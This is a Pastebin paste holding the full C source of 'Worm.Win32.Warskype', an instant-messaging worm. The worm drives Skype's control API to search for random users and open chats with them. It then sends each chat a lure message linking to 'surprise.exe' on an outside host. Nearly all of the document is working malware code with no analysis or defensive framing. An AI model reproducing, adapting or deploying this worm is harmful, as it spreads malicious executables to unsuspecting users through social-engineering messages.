Advertisement
FlyFar

Worm.Win32.Warskype - Source Code

Jul 13th, 2023
1,006
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 5.78 KB | Cybersecurity | 0 0
  1. /***********************************************************************************************
  2.  * I saw many IM worms around but nothing using skype. Skype is a nice IM that let you to      *
  3.  * chat or to do VoIP call, so it is possible to use this program like a spreading vector.     *
  4.  * I tried to do direct file transfer but it didn't work so well, so I decided to send url     *
  5.  * to worm to the found users.                                                                 *
  6.  * This is only a demonstration, this is a direct action worm, it will work only if skype      *
  7.  * is installed.                                                                               *
  8.  * Greetz to: SkyOut, Nibble, izee, RadiatioN, berniee, sk0r, psyco_rabbit ... and everybody   *
  9.  * on #vx-lab and #eof-project                                                                 *
  10.  * bye bye ... by WarGame                                                                      *
  11.  ***********************************************************************************************/
  12.  
  13.  
  14. #include <windows.h>
  15.  
  16. /* Global handlers */
  17. static UINT SkypeAttach;
  18. static UINT SkypeDiscover;
  19. static HWND Answer = NULL;
  20. static HWND SkypeWnd = NULL;
  21. static char rnd_nick[2];
  22.  
  23.  /* generate random nicks to search */
  24. void GetRandNick(void)
  25. {
  26.    
  27.     char possible_searches[] = "qwertyuiopasdfghjklzxcvbnm";
  28.  
  29.     srand(GetTickCount());
  30.     rnd_nick[0] = possible_searches[rand()%26];
  31.     rnd_nick[1] = 0;
  32.  
  33. }
  34.  
  35. DWORD WINAPI S3arch(LPVOID Data)
  36. {
  37.     char msg[128];
  38.     COPYDATASTRUCT cds;
  39.    
  40.     while(1)
  41.     {
  42.     GetRandNick();
  43.     sprintf(msg,"SEARCH USERS %s",rnd_nick);
  44.     cds.dwData= 0;
  45.     cds.lpData= msg;
  46.     cds.cbData= strlen(msg)+1;         
  47.     if(!SendMessage(SkypeWnd, WM_COPYDATA, Answer , (LPARAM)&cds))
  48.     {
  49.         /* skype closed */
  50.         ExitProcess(0);
  51.     }
  52.     Sleep((1000*60)*3); /* every 3 minutes */
  53.     }
  54. }
  55.  
  56. LRESULT CALLBACK SkypeProc(HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam)
  57. {
  58.     PCOPYDATASTRUCT SkypeData = NULL;
  59.     DWORD ThreadID;
  60.     char *found_users = NULL,*chat_cmd = NULL,*chat_id = NULL,msg_cmd[256];
  61.     COPYDATASTRUCT cds;
  62.    
  63.     if(uMsg == SkypeAttach)
  64.     {
  65.         if(lParam == 0)
  66.         {
  67.             SkypeWnd = (HWND)wParam;
  68.             CreateThread(NULL,0,&S3arch,0,0,&ThreadID);
  69.         }
  70.     }
  71.  
  72.     if(uMsg == WM_COPYDATA)
  73.     {
  74.         if(wParam == SkypeWnd)
  75.         {
  76.             SkypeData=(PCOPYDATASTRUCT)lParam;
  77.            
  78.             if(SkypeData != NULL)
  79.             {
  80.                
  81.                 if(strstr(SkypeData->lpData,"CHAT "))
  82.                 {
  83.                     strtok(SkypeData->lpData," ");
  84.                     chat_id = strtok(NULL," ");
  85.                     /* this will send the url to everybody :) */
  86.                     sprintf(msg_cmd,"CHATMESSAGE %s Check this! http://marx2.altervista.org/surprise.exe",chat_id);
  87.  
  88.                     cds.dwData= 0;
  89.                     cds.lpData= msg_cmd;
  90.                     cds.cbData= strlen(msg_cmd)+1;         
  91.                     SendMessage(SkypeWnd, WM_COPYDATA, Answer , (LPARAM)&cds);
  92.                 }
  93.                
  94.                 if(strstr(SkypeData->lpData,"USERS "))
  95.                 {
  96.                     found_users = (char *)GlobalAlloc(GMEM_ZEROINIT|GMEM_FIXED,3096);
  97.                    
  98.                     if(found_users == NULL)
  99.                     {
  100.                         ExitProcess(0);
  101.                     }
  102.  
  103.                     chat_cmd = (char *)GlobalAlloc(GMEM_ZEROINIT|GMEM_FIXED,3096+128);
  104.                    
  105.                     if(chat_cmd == NULL)
  106.                     {
  107.                         ExitProcess(0);
  108.                     }
  109.  
  110.                     strcpy(found_users,(char *)SkypeData->lpData);
  111.  
  112.                     strcpy(found_users,found_users+6);
  113.  
  114.                     sprintf(chat_cmd,"CHAT CREATE %s",found_users);
  115.                    
  116.                     /* contact them :) */
  117.                     cds.dwData= 0;
  118.                     cds.lpData= chat_cmd;
  119.                     cds.cbData= strlen(chat_cmd)+1;        
  120.                     SendMessage(SkypeWnd, WM_COPYDATA, Answer , (LPARAM)&cds);
  121.                    
  122.                     GlobalFree(found_users);
  123.                     GlobalFree(chat_cmd);
  124.  
  125.                 }
  126.             }
  127.         }
  128.     }
  129.    
  130.     DefWindowProc( hWnd, uMsg , wParam, lParam);
  131.  
  132.     return 1; /* != 0 */
  133. }
  134.  
  135. void MakeWindow(void)
  136. {
  137.     WNDCLASS wndcls;
  138.    
  139.     memset(&wndcls,0,sizeof(WNDCLASS));
  140.    
  141.     wndcls.lpszClassName = "WarSkype by [WarGame,#eof]";
  142.     wndcls.lpfnWndProc = SkypeProc;
  143.  
  144.     if(RegisterClass(&wndcls) == 0)
  145.     {
  146.         ExitProcess(0);
  147.     }
  148.  
  149.     Answer = CreateWindowEx(0, wndcls.lpszClassName, "Skype sucks!", 0, -1, -1, 0, 0,
  150.         (HWND)NULL, (HMENU)NULL, (HINSTANCE)NULL, NULL);
  151.  
  152.     if(Answer == NULL)
  153.     {
  154.         ExitProcess(0);
  155.     }
  156. }
  157.  
  158. void RunSkype(void)
  159. {
  160.     HKEY hKey;
  161.     char skype_path[MAX_PATH];
  162.     DWORD len = MAX_PATH;
  163.     STARTUPINFO inf_prog;
  164.     PROCESS_INFORMATION info_pr;
  165.     int user_ret;
  166.  
  167. #define ERROR MessageBox(NULL,"I could not find Skype !","Error!",MB_OK|MB_ICONERROR); \
  168.               ExitProcess(0);
  169.  
  170.        /* path of skype in registry */
  171.         if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Skype\\Phone",0,
  172.             KEY_QUERY_VALUE,&hKey) != ERROR_SUCCESS)
  173.         {
  174.             ERROR
  175.         }
  176.          
  177.         if(RegQueryValueEx(hKey,"SkypePath",0,NULL,skype_path,
  178.             &len) != ERROR_SUCCESS)
  179.         {
  180.             ERROR
  181.         }
  182.  
  183.         RegCloseKey(hKey);
  184.  
  185.         memset(&inf_prog,0,sizeof(STARTUPINFO));
  186.         memset(&info_pr,0,sizeof(PROCESS_INFORMATION));
  187.  
  188.         inf_prog.cb = sizeof(STARTUPINFO);
  189.         inf_prog.dwFlags = STARTF_USESHOWWINDOW;
  190.         inf_prog.wShowWindow = SW_SHOW;
  191.  
  192.         if(CreateProcess(NULL,skype_path,NULL,NULL,FALSE,CREATE_NEW_CONSOLE,NULL,
  193.             NULL,&inf_prog,&info_pr))
  194.         {
  195.             MessageBox(NULL,"Allow this program in skype!","Warning!"
  196.                 ,MB_OK|MB_ICONWARNING);
  197.         }
  198.  
  199.         else
  200.         {
  201.             ERROR
  202.         }
  203. }
  204.  
  205. int __stdcall WinMain (HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
  206. {
  207.     MSG oMessage;
  208.     SkypeAttach = RegisterWindowMessage("SkypeControlAPIAttach");
  209.     SkypeDiscover = RegisterWindowMessage("SkypeControlAPIDiscover");
  210.    
  211.     RunSkype(); /* (try to) run skype */
  212.    
  213.     if(SkypeAttach != 0 && SkypeDiscover != 0)
  214.     {  
  215.         MakeWindow(); /* Create window */
  216.         SendMessage(HWND_BROADCAST, SkypeDiscover, Answer, 0);
  217.  
  218.         while(GetMessage( &oMessage, 0, 0, 0)!=FALSE)
  219.         {
  220.         TranslateMessage(&oMessage);
  221.         DispatchMessage(&oMessage);
  222.         }
  223.        
  224.  
  225.     }
  226.  
  227. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement